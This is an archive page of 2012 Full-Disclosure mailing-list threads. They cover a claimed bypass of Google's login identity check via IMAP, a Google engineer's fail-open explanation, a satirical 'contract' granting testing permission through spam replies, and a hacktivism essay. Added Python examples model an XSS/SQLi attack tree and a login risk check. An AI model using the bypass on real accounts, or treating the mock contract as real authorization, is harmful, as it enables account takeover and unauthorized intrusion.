Hello everybody, I'm new to this mailing list and to security in general. I'm here to learn and I'm starting with a question :) I'm looking for some information about attack tree usage in web application analysis. For my master's thesis I decided to study the usage of this formalism in order to represent attacks on web applications. I need a lot of use cases from which to start learning common attacks, which can help in building a proper tree. Where can I start? I've already read the OWASP top 10 vulnerabilities and I'm familiar with XSS, SQLi, etc.; however I've no clue on how to combine them together in order to perform the steps needed to attack a system. I'm looking for some examples and maybe some famous attacks from which I can understand which steps are performed and how common vulnerabilities can be combined together. Any help is really appreciated. --- Federico.
-- Cordially, Urlan Salgado de Barros CompTIA Security+ Certified MSc.
in Applied Informatics, Bachelor in Computer Science
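Since the question above asks how XSS, SQLi and similar weaknesses are combined into the steps of an attack, here is an added example, not code from the thread or from any of the posters: a small AND/OR attack tree for a hypothetical web application, evaluated for the attacker's cheapest path, with a mitigation step that shows the attacker being re-routed once one weakness is removed. Every node name and effort cost is an assumption made up for the illustration.

```python
# Added example, not code from the thread: an AND/OR attack tree for a
# hypothetical web application. Leaves are individual weaknesses with a
# made-up effort cost; OR nodes need any one child, AND nodes need all of
# them. cheapest() finds the attacker's least-effort path and mitigate()
# shows how removing one weakness re-routes the attack. All names and
# costs are assumptions for the illustration.
from dataclasses import dataclass, field
from typing import List, Tuple

INF = float("inf")

@dataclass
class Node:
    name: str
    kind: str = "leaf"        # "leaf", "or" or "and"
    cost: float = 0.0         # attacker effort, leaves only
    possible: bool = True     # False once a control removes the weakness
    children: List["Node"] = field(default_factory=list)

def leaf(name: str, cost: float) -> Node:
    return Node(name, "leaf", cost)

def any_of(name: str, *children: Node) -> Node:
    return Node(name, "or", children=list(children))

def all_of(name: str, *children: Node) -> Node:
    return Node(name, "and", children=list(children))

def cheapest(node: Node) -> Tuple[float, List[str]]:
    """Return (total cost, leaves used) for the cheapest way to reach node's goal.

    An OR node takes its cheapest child. An AND node sums its children and is
    blocked entirely (cost INF) if any child is impossible.
    """
    if node.kind == "leaf":
        return (node.cost, [node.name]) if node.possible else (INF, [])
    results = [cheapest(c) for c in node.children]
    if node.kind == "or":
        return min(results, key=lambda r: r[0])
    if node.kind == "and":
        if any(r[0] == INF for r in results):
            return (INF, [])
        return (sum(r[0] for r in results), [n for r in results for n in r[1]])
    raise ValueError(f"unknown node kind {node.kind!r}")

def mitigate(node: Node, leaf_name: str) -> None:
    """Mark every leaf called leaf_name as no longer possible (control applied)."""
    if node.kind == "leaf" and node.name == leaf_name:
        node.possible = False
    for child in node.children:
        mitigate(child, leaf_name)

def render(node: Node, depth: int = 0) -> str:
    """Indented text view of the tree."""
    line = "  " * depth + node.name
    if node.kind == "leaf":
        line += f" (cost {node.cost}{', mitigated' if not node.possible else ''})"
    else:
        line += f" [{node.kind.upper()}]"
    return "\n".join([line] + [render(c, depth + 1) for c in node.children])

def build_tree() -> Node:
    """Goal: read another user's data in a hypothetical web application."""
    return any_of(
        "Read another user's data",
        all_of(
            "Hijack an admin session",
            any_of(
                "Obtain the admin's session cookie",
                leaf("Stored XSS in comment field", 3),
                leaf("Reflected XSS via phishing link", 5),
            ),
            leaf("Session cookie lacks HttpOnly", 0),
        ),
        leaf("SQL injection in search, dump users table", 4),
        all_of(
            "Guess an account password",
            leaf("No login rate limiting", 0),
            leaf("Online password guessing", 8),
        ),
    )

if __name__ == "__main__":
    tree = build_tree()
    print(render(tree))
    print("cheapest path:", cheapest(tree))
    mitigate(tree, "Session cookie lacks HttpOnly")              # set HttpOnly
    print("after HttpOnly:", cheapest(tree))
    mitigate(tree, "SQL injection in search, dump users table")  # parameterise
    print("after fixing SQLi:", cheapest(tree))
```

The point the evaluation makes is the one the question is after: the stored XSS on its own is not the attack, the attack is XSS AND a cookie readable from script, so adding HttpOnly (cost 0 for the defender to model) pushes the attacker to the next cheapest branch, and the tree tells you which control to apply next.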
Re: [Full-disclosure] Certificacion - Profesional Pentester
Certainly. In fact, if anyone else wants to help perform the test on behalf of HoG, please let me know and I'll officially write up a change order to specify additional resources.
Timothy "Thor" Mullen www.hammerofgod.com Thor's Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Giles Coochey Sent: Thursday, May 24, 2012 2:38 AM To: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Certificacion - Profesional Pentester
On 23/05/2012 20:26, Thor (Hammer of God) wrote: Hell Juan. As per the conditions of the contract I forwarded, I am pleased to see that you have given me full permission to assess any systems of yours I feel are within scope. I'm copying in FD again so they can all be witness to the fact that you are acting in a manner consistent with the terms of my contract, and that you have given me full permission to do as I wish with any aspect of your network without repercussions. I'm looking forward to it! Thank you.
Is your final report going to be public?
Re: [Full-disclosure] Certificacion - Profesional Pentester
Hell Juan. As per the conditions of the contract I forwarded, I am pleased to see that you have given me full permission to assess any systems of yours I feel are within scope. I’m copying in FD again so they can all be witness to the fact that you are acting in a manner consistent with the terms of my contract, and that you have given me full permission to do as I wish with any aspect of your network without repercussions. I’m looking forward to it! Thank you.
Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: Juan Sacco [mailto:jsa...@exploitpack.com] Sent: Wednesday, May 23, 2012 7:59 AM Subject: Certificacion - Profesional Pentester
Get certified as an information security professional and learn to perform a penetration test yourself. The course lasts 15 hours of hands-on lab work, and a diploma and certificate of attendance are issued (on passing the final exam). The first class starts this Saturday the 26th; it is ONLINE and LIVE. The course content is technical and practical, and it also includes a (complimentary) Exploit Pack licence, the tool we will use to perform intrusion tests. Total cost with discount: 150 USD. Register now: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclickhosted_button_id=UXC4U5BSVP4P4
How is a buffer overflow performed, and how are they prevented?
- Memory management
- Processes and threads
- Writing to memory
- Compiling with GCC
- Debugging with GDB
- Protection techniques
- Web security: SQL and XSS
- Debugging websites
- JavaScript programming
- Security policies
- Computer architecture
- Assembly language
- Buffer overflows
- Writing to and managing the stack
- Exploits with Python
No prior knowledge is required to attend, since it starts from zero. Regards, Juan Sacco Exploit Pack http://exploitpack.com
Re: [Full-disclosure] Certificacion - Profesional Pentester
Other way around. I’ll be sending HIM a bill. Which, based on our contract, I will be able to pay on his behalf ☺
From: Peter Dawson [mailto:slash...@gmail.com] Sent: Wednesday, May 23, 2012 12:50 PM To: Thor (Hammer of God) Cc: Juan Sacco; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Certificacion - Profesional Pentester
yes that's true ..but let's not forget one needs to fork up $150/- before you can finger their servers
2012/5/23 Thor (Hammer of God) t...@hammerofgod.com
Hell Juan. As per the conditions of the contract I forwarded, I am pleased to see that you have given me full permission to assess any systems of yours I feel are within scope. I’m copying in FD again so they can all be witness to the fact that you are acting in a manner consistent with the terms of my contract, and that you have given me full permission to do as I wish with any aspect of your network without repercussions. I’m looking forward to it! Thank you.
Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: Juan Sacco [mailto:jsa...@exploitpack.com] Sent: Wednesday, May 23, 2012 7:59 AM Subject: Certificacion - Profesional Pentester
Get certified as an information security professional and learn to perform a penetration test yourself. The course lasts 15 hours of hands-on lab work, and a diploma and certificate of attendance are issued (on passing the final exam). The first class starts this Saturday the 26th; it is ONLINE and LIVE. The course content is technical and practical, and it also includes a (complimentary) Exploit Pack licence, the tool we will use to perform intrusion tests.
Total cost with discount: 150 USD. Register now: https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclickhosted_button_id=UXC4U5BSVP4P4
How is a buffer overflow performed, and how are they prevented?
- Memory management
- Processes and threads
- Writing to memory
- Compiling with GCC
- Debugging with GDB
- Protection techniques
- Web security: SQL and XSS
- Debugging websites
- JavaScript programming
- Security policies
- Computer architecture
- Assembly language
- Buffer overflows
- Writing to and managing the stack
- Exploits with Python
No prior knowledge is required to attend, since it starts from zero. Regards, Juan Sacco Exploit Pack http://exploitpack.com
Re: [Full-disclosure] Google Accounts Security Vulnerability
It’s you.
Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: Ferenc Kovacs [mailto:tyr...@gmail.com] Sent: Sunday, May 20, 2012 2:23 AM To: Thor (Hammer of God) Cc: Dan Kaminsky; Michael Gray; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability
is it me, or are you not reading the mails that you are replying to?
On Sat, May 19, 2012 at 7:28 PM, Thor (Hammer of God) t...@hammerofgod.com wrote: I tried, and it didn’t work (couldn’t repro). None of this matters – if you have username and password, you can check mail via POP3 or IMAP. Last time I checked, that was “by design.” If anyone is saying this is some sort of vulnerability because someone “happens across your username and password” then they are in the wrong business. Michael – for you to make these claims, get Google involved, and post their replies here but refuse to give them your username (which will be on every email you send out) so they can troubleshoot is really a waste of time. Your initial point of “even the big companies with teams of security experts have security vulnerabilities” seems to shrink a bit when they illustrate concern with the issue yet you refuse to provide the simplest of information. I'm not sure what other expectations one would have of an organization.
Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Dan Kaminsky Sent: Friday, May 18, 2012 1:03 PM To: Michael Gray Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability
Surely you can create a sock puppet for debugging purposes.
On Thu, May 17, 2012 at 11:43 AM, Michael Gray mg...@emitcode.com wrote: I'm not interested in providing that information. You can reproduce it without knowing my user name.
On May 17, 2012 8:45 AM, Mike Hearn he...@google.com wrote: If you provide the name of the account you're logging in to, we can go take a look at what's happening.
On Thu, May 17, 2012 at 5:29 PM, Michael Gray mg...@emitcode.com wrote: Regardless of how you say it works, I can bypass it every time it would seem. Again, by using the method in my original post. It's likely you have a bug if this isn't the functionality you're after. I appreciate the statistics but they mean little to me. Thank you for taking the time to respond. I hope my suggestions and findings will assist you in correcting these issues.
On May 17, 2012 5:51 AM, Mike Hearn he...@google.com wrote: I understand your concerns, however they are not valid. You can be assured of the following: 1) We do not see this system as a replacement for passwords. If we block a login the user is notified and asked if it was them; if it wasn't we ask them to pick a new password.
In very high confidence cases we will immediately force the user to choose a new password, because passwords are still the first line of defense.
2) We do not see this system as a replacement for 2-factor authentication. However the reality is that the vast majority of our users do not use 2-factor authentication and this is unlikely to change any time soon. 2SV imposes a significant extra burden on the user such that despite heavy promotion many users refuse to sign up, and of those that do, many choose to unenroll shortly afterwards. Therefore we also provide this always-on best effort system as well.
3) In fact it is very effective at stopping the large, botnet driven types of attacks we see on a daily basis and so saying it doesn't add any security is wrong. Since going live the system has successfully defended tens of millions of users who have a compromised password. A single unrepresentative data point based on one account isn't enough for you to judge the utility of the system, whereas we can clearly see the stopped campaigns (and drop in number of attempts).
That said, if you have friends and relatives who use Google and you'd like to make them more secure, by all means encourage them to set up two-factor authentication. -- Mike Hearn | Senior Software Engineer | he...@google.com | Account
Re: [Full-disclosure] Google Accounts Security Vulnerability
I tried, and it didn't work (couldn't repro). None of this matters - if you have username and password, you can check mail via POP3 or IMAP. Last time I checked, that was "by design." If anyone is saying this is some sort of vulnerability because someone "happens across your username and password" then they are in the wrong business. Michael - for you to make these claims, get Google involved, and post their replies here but refuse to give them your username (which will be on every email you send out) so they can troubleshoot is really a waste of time. Your initial point of "even the big companies with teams of security experts have security vulnerabilities" seems to shrink a bit when they illustrate concern with the issue yet you refuse to provide the simplest of information. I'm not sure what other expectations one would have of an organization.
Timothy "Thor" Mullen www.hammerofgod.com Thor's Microsoft Security Bible http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Dan Kaminsky Sent: Friday, May 18, 2012 1:03 PM To: Michael Gray Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability
Surely you can create a sock puppet for debugging purposes.
On Thu, May 17, 2012 at 11:43 AM, Michael Gray mg...@emitcode.com wrote: I'm not interested in providing that information. You can reproduce it without knowing my user name.
On May 17, 2012 8:45 AM, Mike Hearn he...@google.com wrote: If you provide the name of the account you're logging in to, we can go take a look at what's happening.
On Thu, May 17, 2012 at 5:29 PM, Michael Gray mg...@emitcode.com wrote: Regardless of how you say it works, I can bypass it every time it would seem. Again, by using the method in my original post. It's likely you have a bug if this isn't the functionality you're after. I appreciate the statistics but they mean little to me. Thank you for taking the time to respond. I hope my suggestions and findings will assist you in correcting these issues.
On May 17, 2012 5:51 AM, Mike Hearn he...@google.com wrote: I understand your concerns, however they are not valid. You can be assured of the following:
1) We do not see this system as a replacement for passwords. If we block a login the user is notified and asked if it was them; if it wasn't we ask them to pick a new password. In very high confidence cases we will immediately force the user to choose a new password, because passwords are still the first line of defense.
2) We do not see this system as a replacement for 2-factor authentication. However the reality is that the vast majority of our users do not use 2-factor authentication and this is unlikely to change any time soon. 2SV imposes a significant extra burden on the user such that despite heavy promotion many users refuse to sign up, and of those that do, many choose to unenroll shortly afterwards. Therefore we also provide this always-on best effort system as well.
3) In fact it is very effective at stopping the large, botnet driven types of attacks we see on a daily basis and so saying it doesn't add any security is wrong. Since going live the system has successfully defended tens of millions of users who have a compromised password. A single unrepresentative data point based on one account isn't enough for you to judge the utility of the system, whereas we can clearly see the stopped campaigns (and drop in number of attempts).
That said, if you have friends and relatives who use Google and you'd like to make them more secure, by all means encourage them to set up two-factor authentication. -- Mike Hearn | Senior Software Engineer | he...@google.com | Account security team
[Full-disclosure] FW: Curso online - Profesional pentesting - Promocion ( 25% de descuento )
Hello Juan. After multiple requests for you to remove me from your unsolicited (and illegal) emails, I see you have refused to do so. This indicates and illustrates your acceptance of a default opt-in until explicit opt-out policy notwithstanding the fact you do not honor the opt-out. Though I still do not wish to receive your mails, I see you are offering penetration testing services. I find this interesting. In order to determine your ability to properly execute on penetration test deliverables, I request your permission to test any and all of your facilities in any way I deem appropriate including (but not limited to) your personal machines, the machines of your coworkers and family, and any other device I deem within scope of my testing. Further, I request you to grant full, unlimited access and authorization for me to test these devices in any way I see fit with full unadulterated impunity. As you have already illustrated your acceptance of a default opt-in until explicit opt-out policy, all I require for your acceptance is for you to send me an email containing any discussions regarding computer security testing or tools. This email serves as notice that further communications regarding pen testing services (or tools) will be an explicit acceptance of the terms set hereinto. This contract will be valid for one year from the date of this email. Again, any further communications regarding services will be your explicit acceptance of these terms. Thanks!
Timothy “Thor” Mullen www.hammerofgod.com Thor’s Microsoft Security Bible
-----Original Message----- From: No Reply [mailto:nore...@exploitpack.com] Sent: Tuesday, May 15, 2012 7:39 PM Subject: Curso online - Profesional pentesting - Promocion ( 25% de descuento )
Become an information security professional and learn to perform a penetration test yourself. The course lasts 15 hours of hands-on lab work, and a diploma and certificate of attendance are issued (on passing the final exam). The course content is technical and practical, and it also includes a (complimentary) Exploit Pack licence, the tool we will use to perform intrusion tests.
About the course: it is taught and developed by Juan Sacco and is designed so that attendees learn how to use the latest intrusion tools and techniques, and also understand the background behind each of the possible vulnerabilities found during the tests.
Total cost WITHOUT discount: 200 USD. Total cost with discount: 150 USD when entering the discount code (only valid for Latin America). Discount code: 0x0833293. For other payment methods such as Western Union or bank transfer, get in touch.
Course type: online and live. Registration link: http://www.anymeeting.com/PIID=EE52D6858547 http://www.linkedin.com/redirect?url=http%3A%2F%2Fwww%2Eanymeeting%2Ecom%2FPIID%3DEE52D6858547urlhash=qkS9_t=mbox_mebc
Mailing list with tutorials and tools: http://groups.google.com/group/exploitpack?hl=es
The first class starts this Saturday, 19 May, at 20:00 (GMT -3:00 Buenos Aires), and we will do a levelling session and set up the lab for the exercises. Don't miss it, it's a unique opportunity! Regards, Juan Sacco Exploit Pack
Re: [Full-disclosure] Google Accounts Security Vulnerability
That's what I said. :D Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Mike Hearn Sent: Wednesday, May 16, 2012 1:38 PM To: full-disclosure@lists.grok.org.uk Cc: mg...@emitcode.com Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability Hi there full-disclosure, I wanted to respond to the recent post covering the Google real time anti-hijacking system and explain a bit more about what this system is and how it works. For background I am the tech lead of the relevant team, and Daniel Margolis works on it with me. Firstly, I'd like to note that despite what Michael may have observed with his account, performing a programmatic login does not whitelist for web access. Most of the time if you would be challenged via the web then logging in via POP or IMAP would also be denied, and result in a notification email about the blocked login. See here for what this looks like: http://blog.plaxo.com/2012/05/google-account-%E2%80%9Csuspicious-activity%E2%80%9D-next-steps/ There are a small number of edge cases that can cause this rule to break. Unfortunately although Daniel asked for it, Michael has not provided the name of the account in question so we cannot check which one it was. To understand why this is not a problem it's important to understand the design parameters of this security system. The real-time antihijack system was created to solve a specific problem, namely, spammers/scammers turning up at our front door with large numbers of valid passwords. I gave a public talk at the RIPE64 conference last month which provides some background: https://ripe64.ripe.net/archives/video/25/ https://ripe64.ripe.net/presentations/48-AbuseAtScale.pdf (slides) Executive summary: it is no longer unexpected for individual attackers to own on the order of a million valid passwords. 
These passwords are taken from compromised websites and the hashes reversed using GPUs. We have in the past seen known attackers correctly authenticate to over 30 accounts per second and this problem is structural - it isn't going to go away any time soon. For this reason we now perform a risk analysis of every login and if we suspect it may not be the real owner of the account, redirect it to identity verification. This is what Michael saw.
The primary design principle of the system is to move all our users into the post-password age as gently as possible. The threat model covers attacks that operate at scale and who do not care about the specific accounts they work with. We provide things like 2-step verification, which authenticates you via a device or phone, for handling the stronger threat model of a highly motivated adversary against a specific highly motivated defender. One outcome of this threat model is that if we can protect 95% of accounts from an attacker, that's good enough because it renders their attack uneconomic and they go away. See this paper from Microsoft Research: http://research.microsoft.com/pubs/149885/wheredoalltheattacksgo.pdf
For this reason the system will usually fail open if there is a problem of some kind. An example of what can cause the type of behavior Michael saw: if the risk analysis subsystem misses its deadline, the login processing servers will proceed without it. Timeouts are rare but can occasionally happen. There are other cases involving specific types of account history and IP address combinations that could cause what Michael observed. Or there could be a bug :-)
It's best to view the risk analysis / id verification system as more like a spam filter than a hard-guarantee security system. It relies heavily on security through obscurity and exploiting weaknesses of very specific opponents, against which it has proven very effective.
Analyzing it as if it were a complete replacement for password security will lead only to disappointment. thanks /mike
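The two behaviours Mike describes above, a risk score consulted under a deadline with the login proceeding without it when the deadline is missed (fail open), and the same verdict applying to a web login and to a POP/IMAP login, as an added example that is not Google's code and not part of the original post. The account history, the scoring rule, the threshold, the deadline and the protocol names are all constructed assumptions; the scorer is deliberately a toy so the decision logic around it is what shows.

```python
# Added example, not Google's code: a login decision that runs a risk
# scorer under a deadline, applies one verdict to web and programmatic
# (IMAP/POP) logins, and fails open when the scorer misses its deadline.
# The account history, scores and threshold are constructed for the demo.
import concurrent.futures as cf
import time
from dataclasses import dataclass
from typing import Callable, Dict, NamedTuple, Set

@dataclass(frozen=True)
class LoginAttempt:
    account: str
    source_ip: str
    protocol: str        # "web", "imap" or "pop3"
    password_ok: bool    # the password check is always evaluated first

class Decision(NamedTuple):
    verdict: str         # "ALLOW", "CHALLENGE" (web id verification) or "DENY"
    notify_owner: bool   # send the "suspicious sign-in" notification mail

# Constructed history: /24 prefixes each account is normally seen from.
KNOWN_PREFIXES: Dict[str, Set[str]] = {
    "alice": {"203.0.113."},
    "bob": {"198.51.100.", "192.0.2."},
}

def risk_score(attempt: LoginAttempt) -> float:
    """Toy model: 0.0 means 'looks like the owner', 1.0 means 'looks hijacked'."""
    prefixes = KNOWN_PREFIXES.get(attempt.account, set())
    return 0.1 if any(attempt.source_ip.startswith(p) for p in prefixes) else 0.9

def slow_risk_score(attempt: LoginAttempt) -> float:
    """Same model but far too slow: stands in for an overloaded risk subsystem."""
    time.sleep(1.0)
    return risk_score(attempt)

def decide(attempt: LoginAttempt,
           scorer: Callable[[LoginAttempt], float] = risk_score,
           deadline_s: float = 0.1,
           threshold: float = 0.5,
           fail_open: bool = True) -> Decision:
    """Password first; then the risk verdict, protocol-independent."""
    if not attempt.password_ok:
        return Decision("DENY", False)
    pool = cf.ThreadPoolExecutor(max_workers=1)
    future = pool.submit(scorer, attempt)
    try:
        score = future.result(timeout=deadline_s)
    except cf.TimeoutError:
        # Deadline missed. Fail open (proceed as if low risk), which is what
        # the post describes, or fail closed (treat as suspicious).
        pool.shutdown(wait=False)
        if fail_open:
            return Decision("ALLOW", False)
        return Decision("CHALLENGE" if attempt.protocol == "web" else "DENY", True)
    pool.shutdown(wait=False)
    if score < threshold:
        return Decision("ALLOW", False)
    # One rule for every protocol: the web flow can render an identity
    # verification page; IMAP/POP cannot, so they are refused and the owner told.
    if attempt.protocol == "web":
        return Decision("CHALLENGE", True)
    return Decision("DENY", True)

if __name__ == "__main__":
    for a in (LoginAttempt("alice", "203.0.113.7", "web", True),
              LoginAttempt("alice", "192.0.2.9", "web", True),
              LoginAttempt("alice", "192.0.2.9", "imap", True)):
        print(a.protocol, a.source_ip, decide(a))
    print("deadline missed, fail open:", decide(LoginAttempt("alice", "192.0.2.9", "imap", True), slow_risk_score))
```

The fail-open branch is the part worth reading twice: with fail_open=True a scorer timeout turns an IMAP login from an unknown network into ALLOW with no notification, which is exactly the edge case the post offers as an explanation for what Michael saw. Flipping it to fail closed trades that gap for lockouts whenever the risk subsystem is slow, which is the operational reason a large provider might accept the open default.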
Re: [Full-disclosure] Google Accounts Security Vulnerability
I'm not sure I understand the issue here - the requirement for someone happening to come across your username and password is a pretext. Logging on to the web interface where you can change password and other personal information as well as verify existing site cookies affords the service the ability to check these sorts of things. But you logged on via IMAP, which is its own service just like POP3 or SMTP. These services can't check where you are or for the existence of a cookie, so I'm not really sure what your expectation is, or why this is being presented as an issue. Am I missing something? Timothy Thor Mullen www.hammerofgod.com Thor's Microsoft Security Bible -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jason Hellenthal Sent: Saturday, May 12, 2012 9:32 AM To: Michael J. Gray Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability LMFAO! On Sat, May 12, 2012 at 04:22:30AM -0700, Michael J. Gray wrote: Effective since May 1, 2012. Products Affected: All Google account based services Upon attempting to log-in to my Google account while away from home, I was presented with a message that required me to confirm various details about my account in order to ensure I was a legitimate user and not just someone who came across my username and password. Unable to remember what my phone number from 2004 was, I looked for a way around it. The questions presented to me were: Complete the email address: a**g...@gmail.com Complete the phone number: (425) 4**-***7 Since this was presented to me, I was certain I had my username and password correct. From there, I simply went to check my email via IMAP at the new location. I was immediately granted access to my email inboxes with no trouble. From there, I attempted to log-in to my Google account with the same username and password. 
To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure. This just goes to show that even the largest corporations that employ teams of security experts can also overlook very simple issues.
-- - (2^(N-1))
Re: [Full-disclosure] Google Accounts Security Vulnerability
Logging on to IMAP mail as one would be doing hundreds of times per day is not going to reset the web cookie. If that is what the OP is reporting, I would have to question if his recollection is correct since, by that logic, the password reset feature would never be activated since any other IMAP logon would clear it. If the user logged in, and was presented with the questions as stated, then it probably cleared any requirement since he would have to accept that. Unless he is saying that when presented with the questions he purposefully did not put them in and tried to logon to IMAP which I find odd.

Regardless, if you already know the username and password for the email, it doesn't matter anyway now does it? You could always get the mail via IMAP or POP or whatever options were configured in gmail. There wouldn't be any need to go to the web interface in the first place.

Now that I know I'm not missing anything, I'll just let this one die on the vine.

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible <http://www.amazon.com/Thors-Microsoft-Security-Bible-Collection/dp/1597495727>

From: Mateus Felipe Tymburibá Ferreira [mailto:mateusty...@gmail.com]
Sent: Tuesday, May 15, 2012 12:21 PM
To: Thor (Hammer of God)
Cc: Jason Hellenthal; Michael J. Gray; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability

I'm just copying the original message's part that probably answers your question (I did not test it...):

From there, I attempted to log-in to my Google account with the same username and password. To my surprise, I was not presented with any questions to confirm my identity. This completes the steps required to bypass this account hijacking counter-measure.

Mateus Felipe Tymburibá Ferreira, M. Sc. student at UFAM <http://portal.ufam.edu.br>
CISSP <https://www.isc2.org/cissp/default.aspx>, OSCP <http://www.offensive-security.com/information-security-certifications/oscp-offensive-security-certified-professional/>, OSCE <http://www.offensive-security.com/information-security-certifications/osce-offensive-security-certified-expert/>, OSWP <http://www.offensive-security.com/information-security-certifications/oswp-offensive-security-wireless-professional/>

2012/5/15 Thor (Hammer of God) <t...@hammerofgod.com>

I'm not sure I understand the issue here - the requirement for someone happening to come across your username and password is a pretext. Logging on to the web interface where you can change password and other personal information as well as verify existing site cookies affords the service the ability to check these sorts of things. But you logged on via IMAP, which is its own service just like POP3 or SMTP. These services can't check where you are or for the existence of a cookie, so I'm not really sure what your expectation is, or why this is being presented as an issue. Am I missing something?

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Jason Hellenthal
Sent: Saturday, May 12, 2012 9:32 AM
To: Michael J. Gray
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Google Accounts Security Vulnerability

LMFAO!

On Sat, May 12, 2012 at 04:22:30AM -0700, Michael J. Gray wrote:

Effective since May 1, 2012.
Products Affected: All Google account based services

Upon attempting to log-in to my Google account while away from home, I was presented with a message that required me to confirm various details about my account in order to ensure I was a legitimate user and not just someone who came across my username and password. Unable to remember what my phone number from 2004 was, I looked for a way around it.

The questions presented to me were:
Complete the email address: a**g...@gmail.com
Complete the phone number: (425) 4**-***7

Since this was presented to me, I was certain I
Re: [Full-disclosure] cDc Created Hong Kong Blondes and 'Hacktivism' as a Media Hack
Got any decaf?

Timothy Thor Mullen
www.hammerofgod.com
Thor's Microsoft Security Bible

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Wei Honker
Sent: Thursday, May 03, 2012 12:24 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] cDc Created Hong Kong Blondes and 'Hacktivism' as a Media Hack

cDc Created Hong Kong Blondes and 'Hacktivism' as a Media Hack
http://weihonker.tumblr.com/

Anonymous is a Lie

Anonymous is a lie. Anonymous is built on a false foundation that casts a pale shadow over anything and everything they attempt to accomplish. While born out of the trolls and lulz of the /b/ board on fourchan, Anonymous has quickly become an online activist movement. The group has targeted everything from oppressive regimes in the Middle East to opposition about Internet censorship. They have been launching DDoS attacks from the comfort of their basements while people in the street are literally gunned down, and then they have the audacity to claim victory for themselves because they managed to take a website offline for a few hours. These actions, these minor irritations, have given Anonymous the audacity to call themselves hacktivists, a term that is itself a lie. By using the term hacktivist or hacktivism Anonymous is helping to perpetuate one of the biggest media hacks of all time and they don't even know it.

Pulling pranks on the media has a long history with the computer underground. One of the best examples is the entire movie Hackers, which is so full of inside jokes they cease to be funny. Although when you examine the list of technical consultants the lack of humor makes sense. Hackers, the movie, is such a huge media hack the plot is used not once, but twice. The second time with Serena Achtul and the 'True Life' show on MTV. The show supposedly illustrates a so called 'hacker' who convinces Serena to follow him around while he attempts to retrieve a disk before the feds do, which is exactly the same plot used in the movie 'Hackers'. Even after Serena and MTV were told they were being trolled they chose to air the footage anyway.

I don't know who from the computer underground was the first to execute a media hack, but some of the best have come from the Cult of the Dead Cow. To give you an idea of just how prolific and proficient the cDc is at hacking the media, consider that their slogan is 'World Domination through Media Saturation'. This is nowhere more apparent than the spectacle that was the BO2K release during Defcon in 1999. No software launch in recorded history, including those done by the media savvy Apple Inc., could touch this. Everything from smashing guitars to furry assless chaps to bad rap music with all the cDc members prancing around on stage as if it was the second coming. All that spectacle for nothing more than a remote access tool, something with almost the exact same feature set as PC Anywhere except that it runs on a different port number. Even Microsoft themselves said that BO2K wasn't a threat, but the press ate it up anyway and cDc proved again that they were in fact master media manipulators.

Hacktivism is another brainchild of cDc designed to fool and trick the media and all who choose to be associated with the term. The creation of the term is supposedly well documented as being first used by cDc member Omega in an IRC chat room in 1996. But close examination of the hacktivism Wikipedia page and that page's history shows a second possible source for the term, that of techno-culture writer Jason Sack in a piece about media artist Shu Lea Cheang, published in InfoNation in 1995, which pre-dates cDc's claim to the term. This co-option of the term itself is part of cDc's plan to execute the biggest media hack of all time encompassing all of 'hacktivism'.

But co-opting the term itself is not enough. cDc felt they needed something to take advantage of the term and to plunge it fully into the media spotlight. They came up with a fictitious international hacking group, a group who would only attack corporations that did not support human rights, and so the Hong Kong Blondes were born. Reading the initial interview between the supposed Hong Kong Blondes leader 'Blondie Wong' and the cDc member 'Oxblood Ruffin' in cDc #356 now, fourteen years later, makes the entire ruse plainly obvious. Arik Hesseldahl, who ran the initial story in Wired based solely on this interview, with absolutely no corroborating evidence in the first place, has since privately expressed his doubts about the story. By publishing this article he unwittingly became the first rube in a long line of media rubes that the cDc played with ever increasing dexterity. Hesseldahl has most likely not publicly expanded on his misgivings over the story as it would draw attention to his original reservations and expose the fact that he failed to
Re: [Full-disclosure] Vulnerability in Gentoo hardened
Which always turns out to be the best...

Sent from my Windows Phone

From: valdis.kletni...@vt.edu
Sent: 4/24/2012 9:16 AM
